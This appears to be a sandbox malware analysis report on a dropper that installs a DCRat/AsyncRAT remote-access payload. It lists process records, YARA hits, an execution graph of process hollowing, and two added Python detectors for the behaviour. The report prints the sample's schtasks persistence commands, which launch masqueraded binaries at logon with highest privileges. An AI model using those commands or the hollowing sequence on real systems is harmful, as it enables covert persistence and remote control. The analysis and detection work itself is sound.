                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:


                                              Target ID:0
                                              Start time:22:01:59
                                              Start date:26/11/2024
                                              Path:C:\Users\user\Desktop\UNFOT5F1qt.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\UNFOT5F1qt.exe"
                                              Imagebase:0x420000
                                              File size:1'131'531 bytes
                                              MD5 hash:1C40D9E61FBBD5D9054638B98B10E1CF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:22:02:00
                                              Start date:26/11/2024
                                              Path:C:\Users\user\Desktop\UNFOT5F1qt.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\UNFOT5F1qt.exe"
                                              Imagebase:0x8a0000
                                              File size:1'131'531 bytes
                                              MD5 hash:1C40D9E61FBBD5D9054638B98B10E1CF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:5
                                              Start time:22:02:00
                                              Start date:26/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe"
                                              Imagebase:0x820000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000000.1348990255.0000000000822000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              Target ID:6
                                              Start time:22:02:00
                                              Start date:26/11/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 1156
                                              Imagebase:0xaf0000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:22:02:00
                                              Start date:26/11/2024
                                              Path:C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe"
                                              Imagebase:0x400000
                                              File size:440'224 bytes
                                              MD5 hash:74BE806E27A351565F2EC136DCB5232C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 0%, ReversingLabs
                                              Reputation:low
                                              Has exited:false

                                              Target ID:9
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Recovery\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Users\All Users\Application Data\Application Data\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:13
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:14
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:15
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\regedit\explorer.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:16
                                              Start time:22:02:03
                                              Start date:26/11/2024
                                              Path:C:\Windows\System32\schtasks.exe
                                              Wow64 process (32bit):false
                                              Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                                              Imagebase:0x7ff774c70000
                                              File size:235'008 bytes
                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Target ID:17
                                              Start time:22:02:04
                                              Start date:26/11/2024
                                              Path:C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe"
                                              Imagebase:0x3d0000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.1426473572.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              Has exited:true

                                              Target ID:18
                                              Start time:22:02:05
                                              Start date:26/11/2024
                                              Path:C:\Windows\regedit\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\regedit\explorer.exe
                                              Imagebase:0x810000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000012.00000002.1476991915.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\regedit\explorer.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Windows\regedit\explorer.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Windows\regedit\explorer.exe, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              Has exited:true

                                              Target ID:19
                                              Start time:22:02:05
                                              Start date:26/11/2024
                                              Path:C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
                                              Imagebase:0xb90000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: ditekSHen
                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, Author: ditekSHen
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 88%, ReversingLabs
                                              Has exited:true

                                              Target ID:23
                                              Start time:22:02:13
                                              Start date:26/11/2024
                                              Path:C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe"
                                              Imagebase:0x510000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1520715428.000000000285A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Has exited:true

                                              Target ID:27
                                              Start time:22:02:38
                                              Start date:26/11/2024
                                              Path:C:\Windows\regedit\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\regedit\explorer.exe"
                                              Imagebase:0x100000
                                              File size:586'240 bytes
                                              MD5 hash:222EDC84E2D32948F2639554B23E7B04
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Has exited:true
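The five schtasks.exe records above share one shape: an ONLOGON trigger, /rl HIGHEST, a task name copied from a Windows binary, and an action path outside the directory where that binary actually lives (C:\Users\Default User, a C:\Windows\regedit folder that does not exist on a clean system, a MsRdpWebAccess folder under SysWOW64). The Python below is an added triage helper written for this page; it is not part of the Joe Sandbox report and not DCRat code. It parses schtasks /create command lines of this form and flags the three traits. The expected-location table, the user-writable path markers and the one benign command line in the sample set are the editor's assumptions, not data from the report.

```python
"""Triage schtasks /create command lines for DCRat-style persistence.

Added example (not from the sandbox report): parses the switches the sandbox
recorded (/tn, /sc, /tr, /rl) and flags (1) a Windows binary name launched
from the wrong directory, (2) an action that lives in a user-writable
location and (3) an ONLOGON task with /rl HIGHEST whose image is not in a
system root.  The tables below are the editor's assumptions.
"""
import ntpath
import re

# Where each impersonated binary legitimately lives (lower-case, no trailing '\').
EXPECTED_HOME = {
    "wmiprvse.exe": {r"c:\windows\system32\wbem", r"c:\windows\syswow64\wbem"},
    "werfault.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "explorer.exe": {r"c:\windows", r"c:\windows\syswow64"},
    "runtimebroker.exe": {r"c:\windows\system32"},
}
SYSTEM_ROOTS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}
USER_WRITABLE_MARKERS = (
    "\\users\\", "\\documents and settings\\", "\\programdata\\", "\\temp\\", "\\public\\",
)

# Command lines copied from the process records above.
REPORT_CMDLINES = [
    r'''schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\WmiPrvSE.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "WerFault" /sc ONLOGON /tr "'C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "HSZUYllrTVQhIRaXpKBgYbmVnCoTc" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\regedit\explorer.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Documents and Settings\Public\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f''',
]
# Constructed benign line: same trigger and run level, but the real explorer.exe.
BENIGN_CMDLINE = r'''schtasks.exe /create /tn "Explorer" /sc ONLOGON /tr "C:\Windows\explorer.exe" /rl HIGHEST /f'''

SWITCH_RE = re.compile(r'/(tn|sc|tr|rl)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)


def parse_schtasks_create(cmdline):
    """Return the /tn /sc /tr /rl values of a schtasks /create line (keys lower-case)."""
    opts = {}
    for m in SWITCH_RE.finditer(cmdline):
        opts[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
    return opts


def image_from_action(action):
    """Extract the executable path from a /tr value; handles the "'path'" nesting seen above."""
    action = action.strip()
    for quote in ("'", '"'):
        if action.startswith(quote) and quote in action[1:]:
            return action[1:action.index(quote, 1)]
    return action.split()[0] if action else ""


def assess_task(cmdline):
    """Return {'task', 'image', 'findings'} for one schtasks /create command line."""
    opts = parse_schtasks_create(cmdline)
    image = image_from_action(opts.get("tr", ""))
    parent = ntpath.dirname(image).lower().rstrip("\\")
    name = ntpath.basename(image).lower()
    findings = []
    expected = EXPECTED_HOME.get(name)
    if expected is not None and parent not in expected:
        findings.append("masquerade")            # system binary name, wrong directory
    if any(marker in parent + "\\" for marker in USER_WRITABLE_MARKERS):
        findings.append("user_writable")         # any user could have dropped it there
    if (opts.get("sc", "").upper() == "ONLOGON"
            and opts.get("rl", "").upper() == "HIGHEST"
            and parent not in SYSTEM_ROOTS):
        findings.append("elevated_logon_outside_system")
    return {"task": opts.get("tn"), "image": image, "findings": findings}


def suspicious_tasks(cmdlines):
    """Assess every line and keep only those with at least one finding."""
    return [r for r in (assess_task(c) for c in cmdlines) if r["findings"]]


if __name__ == "__main__":
    for result in suspicious_tasks(REPORT_CMDLINES + [BENIGN_CMDLINE]):
        print(f"{str(result['task']):<32} {result['image']}")
        print("    " + ", ".join(result["findings"]))
```

The random-named task (HSZUY...) is caught only by the third rule, which also fires on some legitimate third-party updaters that register an elevated logon task from Program Files; treat that rule as a triage signal and the masquerade rule as the high-confidence one. On a live host the same checks can be run over the output of schtasks /query /xml or the Task Scheduler event log (event 4698) rather than over sandbox process records.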


                                                Execution Graph

                                                Execution Coverage:17.3%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:17.9%
                                                Total number of Nodes:151
                                                Total number of Limit Nodes:14
                                                execution_graph (node and edge list omitted; the graph records the following call chains in the decrypted region at 0xF30000)
                                                • f38fe2 -> f38f53 -> f39c06/f39dc0 -> f39c23 -> f3d25c/f3d268: CreateProcessA (via f3ced6/f3cee0) -> Wow64SetThreadContext (f3c6b0/f3c6b8) -> VirtualAllocEx (f3cb6a/f3cb98) -> WriteProcessMemory (f3cc50/f3cc58, three call sites) -> Wow64SetThreadContext -> ResumeThread (f3c602/f3c608) -> SetKernelObjectSecurity (f3dc72 via f3c8dc) -> VirtualProtect (f3e3d1 via f3c978)
                                                • f3ee30 -> f3ee74: GetSystemInfo (f3cb04 -> f3fd38), then VirtualProtectEx (f3cb2c) and LdrInitializeThunk (f3f1a8) in a loop around f3eec7
                                                • f30858 -> f30872 -> f30880/f30890 -> f308a1 -> f30c10: LoadLibraryA (f30d12)
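Read in call order, the execution graph records the classic hollowing sequence in the decrypted code at 0xF30000: CreateProcessA, then VirtualAllocEx, WriteProcessMemory (three call sites), Wow64SetThreadContext and ResumeThread, with SetKernelObjectSecurity and VirtualProtect applied afterwards. The Python below is an added example written for this page, not part of the sandbox report, showing how to turn that order into a detector over a per-process API trace. It matches the chain as an ordered subsequence, so interleaved calls (the early Wow64SetThreadContext, the repeated writes) do not break the match, while a process that calls the same APIs in a different order is not flagged. It generalises beyond the graph in one respect: each step accepts the wide and native forms of the API as well as the name the graph shows; those aliases and the sample trace are the editor's assumptions.

```python
"""Ordered-subsequence detector for the process-hollowing API chain.

Added example (not from the sandbox report): each step is a set of
equivalent API names, so the detector also accepts wide/native variants
that the execution graph above does not show (editor's assumption).
"""
from collections import defaultdict

HOLLOWING_CHAIN = [
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},       # spawn the host
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},                        # carve out remote memory
    {"WriteProcessMemory", "NtWriteVirtualMemory"},                       # copy the payload in
    {"Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"},  # redirect the entry point
    {"ResumeThread", "NtResumeThread"},                                   # run the injected image
]

# Constructed trace: (pid, api) in call order.  4660 mirrors the graph above,
# 7012 is a benign launcher, 8844 calls the same APIs out of order.
SAMPLE_TRACE = [
    (4660, "CreateProcessA"),
    (4660, "Wow64SetThreadContext"),   # before the allocation: skipped by the cursor
    (4660, "VirtualAllocEx"),
    (4660, "WriteProcessMemory"),
    (4660, "WriteProcessMemory"),
    (4660, "WriteProcessMemory"),
    (4660, "Wow64SetThreadContext"),
    (4660, "ResumeThread"),
    (4660, "SetKernelObjectSecurity"),
    (4660, "VirtualProtect"),
    (7012, "CreateProcessA"),
    (7012, "WaitForSingleObject"),
    (7012, "CloseHandle"),
    (8844, "CreateProcessA"),
    (8844, "VirtualAllocEx"),
    (8844, "ResumeThread"),            # resumed before anything was written
    (8844, "WriteProcessMemory"),
]


def match_chain(events, chain):
    """Return {pid: [event indices]} for every pid whose calls contain `chain`
    as an ordered subsequence.  A call that is not the step currently expected
    for that pid is skipped, so unrelated calls between steps are tolerated."""
    cursor = defaultdict(int)      # next chain step expected per pid
    hits = defaultdict(list)       # indices of the events that matched so far
    complete = {}
    for idx, (pid, api) in enumerate(events):
        if pid in complete:
            continue
        if api in chain[cursor[pid]]:
            hits[pid].append(idx)
            cursor[pid] += 1
            if cursor[pid] == len(chain):
                complete[pid] = hits[pid]
    return complete


def detect_hollowing(events):
    """Processes whose trace completes the hollowing chain."""
    return match_chain(events, HOLLOWING_CHAIN)


def partial_progress(events, chain=HOLLOWING_CHAIN):
    """How many chain steps each pid reached; useful for triaging near-misses."""
    cursor = defaultdict(int)
    for pid, api in events:
        if cursor[pid] < len(chain) and api in chain[cursor[pid]]:
            cursor[pid] += 1
    return dict(cursor)


if __name__ == "__main__":
    for pid, idxs in detect_hollowing(SAMPLE_TRACE).items():
        steps = " -> ".join(SAMPLE_TRACE[i][1] for i in idxs)
        print(f"pid {pid}: hollowing chain complete: {steps}")
    print("progress per pid:", partial_progress(SAMPLE_TRACE))
```

Keying the chain on the pid alone is what a sandbox API log allows; on an endpoint with richer telemetry the same cursor should be keyed on the process handle returned by CreateProcess and passed to the later calls, otherwise a debugger or security product that legitimately creates and writes into processes will produce the same sequence. Pair the result with the report's own "Injects a PE file into a foreign processes" signature rather than treating the chain as proof on its own.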

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph for the function at f3ee30 (basic-block edge list omitted): blocks span f3ee30-f3fc7e; the function calls f3caf8, f3cb04, f3cb20 (repeatedly), f3cb2c, f3cb38 and f30408, and the block at f3f194-f3f1b2 calls LdrInitializeThunk and loops back through f3f1b3-f3f1be
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: 2fb68ea7708eabd108d7e6637ec9a5278a5808df63fa27216acb245213d7ef04
                                                • Instruction ID: 430d150040943db2cc8bb1a271ce796c9bd6cb8eafcdb52e0ed9afb274c37a56
                                                • Opcode Fuzzy Hash: 2fb68ea7708eabd108d7e6637ec9a5278a5808df63fa27216acb245213d7ef04
                                                • Instruction Fuzzy Hash: 0E82C371E002298FDB64CF69C880BEDB7F2BF88314F1481EAD549AB255DB349E859F50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph for the function at f3d268 (basic-block edge list omitted): the entry block f3d268-f3d33b calls f39178; the graph then shows the injection sequence as the call sites f3d33e (f3cee0/f3ced6: CreateProcessA), f3d407 (f3c6b0/f3c6b8: Wow64SetThreadContext), f3d59a (f3cb6a/f3cb98: VirtualAllocEx), f3d609, f3d7e6 and f3d8a2 (f3cc50/f3cc58: WriteProcessMemory), f3d975 (f3c6b0/f3c6b8: Wow64SetThreadContext), f3d9aa (f3c602/f3c608: ResumeThread) and f3d9ca-f3da0b (f3dc72: SetKernelObjectSecurity, f3e3d1: VirtualProtect); each failed step branches to the error blocks at f3da79 or f3dade
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Q
                                                • API String ID: 0-3463352047
                                                • Opcode ID: ba6c8875b29b1374c66045828cf6187715f6f50a415152b8ee3f5add9463c379
                                                • Instruction ID: b2bc318a026e5c655b71e169dbb37928f7fd14c868849639ed081edcc5b92892
                                                • Opcode Fuzzy Hash: ba6c8875b29b1374c66045828cf6187715f6f50a415152b8ee3f5add9463c379
                                                • Instruction Fuzzy Hash: 4432C5B0D00218CFEB64CFA9D944BDDB7B2BB88314F14C19AD018B7295D7799A85DF24
                                                APIs
                                                • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,00F3EEC7), ref: 00F3FD9F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: 6f3a6f31e0f9adba314bcedda1a5ee9db58d39d0c68d31a1985a222c49bf8718
                                                • Instruction ID: ba017ed6ece09a8dd293006deabfc1bfd1370fd32b445a0fb4c15d917dead90b
                                                • Opcode Fuzzy Hash: 6f3a6f31e0f9adba314bcedda1a5ee9db58d39d0c68d31a1985a222c49bf8718
                                                • Instruction Fuzzy Hash: 39110FB1D0065A9BDB00DF9AC948B9EFBF4FB48324F10816AD918B7240D3B4A904CFE1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d185b4e464592032b931d69881fef23a576e74ffcf51ee531c04df6700b701f6
                                                • Instruction ID: 35d9c54035f2a518f34057919bf0aac007ec2e6f95377d6cec010737708c61cb
                                                • Opcode Fuzzy Hash: d185b4e464592032b931d69881fef23a576e74ffcf51ee531c04df6700b701f6
                                                • Instruction Fuzzy Hash: 48F16C70A002198FDB18DFA9D8947AE7BB6BF88310F248159E816EB395DF34DE41DB50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1456563983.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f30000_UNFOT5F1qt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
